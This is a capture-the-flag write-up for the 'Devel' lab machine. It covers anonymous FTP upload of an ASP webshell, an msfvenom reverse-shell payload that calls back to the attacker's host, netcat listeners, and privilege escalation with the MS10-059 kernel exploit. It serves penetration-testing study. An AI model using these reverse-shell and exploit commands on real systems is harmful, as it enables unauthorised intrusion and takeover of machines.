# DEVEL | 10.10.10.5

## Initial Enumeration - nmap

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and their Services

* 21 - FTP - Microsoft ftpd
* 80 - Microsoft IIS 7.5

### OS Discovery

Since this box is running IIS 7.5, the OS version is either Windows 7 or Windows Server 2008 R2, according to google.

## Services Enumeration

### FTP - 21

This ftp server allows anonymous access and appears to be the root dir of the web server. This could mean easy exploitation as I could upload a reverse shell and execute it via the browser.

![ftp-enum](img/ftp-enum.png)

I made up a quick htm test file and uploaded it to the server; I was able to connect to it through the browser:

![test](img/test-htm.png)

Now to try if I can upload an .asp file and connect that way. On Kali there are some webshells ready to use, I found one here:

    /usr/share/webshells/asp/cmdasp.asp

I uploaded it and tried to connect and this was the result:

![cmdasp](img/cmdasp.png)

Nice! it tells me what user the service is running under, and confirms command execution.

### 80 - HTTP

As we have already noted, this port is running IIS 7.5, and the FTP server allows write access to the root dir.

Next step is to upload and execute a reverse shell.

## Exploitation

Uploading a .aspx webshell worked better, so that tells me I should create and upload a reverse shell based on that.

To create the payload, I used msfvenom:

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.36 LPORT=6969 -f aspx -o shelly.aspx  

I then used the FTP to upload the file, started a netcat listener on my machine, then navigated to the file in the browser:

    ftp> put shelly.aspx  
    # rlwrap nc -nvlp 6969  

![shell](img/shell.png)

## User enumeration

First, gotta grab the flag for the proof:

![ohno](img/ohno.png)

Oh no, I don't have access to the users folder. I am a different user (a service user I think) and this time I don't have access to the regular user's files. Oh well, I'll continue to enumerate this user and see what I find.

After running whoami /all, I see this user has **SeImpersonatePrivilege**, which means maybe I can JuicyPotato my way to privesc.

![whoami](img/whoami-all.png)

systeminfo reveals a Windows 7 Enterprise 32-bit with no hotfixes installed. Sweet.

![sysinfo](img/sysinfo.png)


I was unable to run winPEAS, so I opted for [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester), since I can run that locally.

    ./win-ex-suggester.py --update
    ./win-ex-suggester.py -d 2020-09-21-mssb.xls -i sysinfo.txt

There are some good results there, and I recognize one I've seen before - **MS10-059** - otherwise known as ["Chimichurri"](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri).

![suggester](img/suggester.png)

So that will be my first attempt at privesc.

## Privilege Escalation

### Chimichurri - MS10-059

Admittedly most of what this exploit is doing is over my head, but it appears that the exploit occurs in a vulnerability in the tracing feature for services, allowing elevation of privilege though token impersonation.  
This exploit relies on the user having the SeImpersonatePrivilege enabled, and maybe the user needs to be a service account too?

Anyway, I need to have a netcat listener on my end, waiting to catch the elevated connection:

    # nc -nvlp 9001  

And then on the windows machine I run the exploit:

    > chimi.exe 10.10.14.36 9001  

And now I am NT AUTHORITY\SYSTEM

![root](img/root-shell.png)

And able to read both flags, which means I'm done.

**User flag**
![user](img/user-flag.png)

**Root flag**
![root](img/root-flag.png)

## Conclusion

This was an easy box, which is nice because I needed and easy win. I am still learning and I get stuck often. To summarize, the steps I took were:

* Upload a reverse .aspx shell to an FTP server that allowed anonymous login
* That server's dir happened to be the root dir of the server running on port 80
* Then I was able to escalate my privileges by exploiting a well-known kernel vulnerability because the machine was not patched.
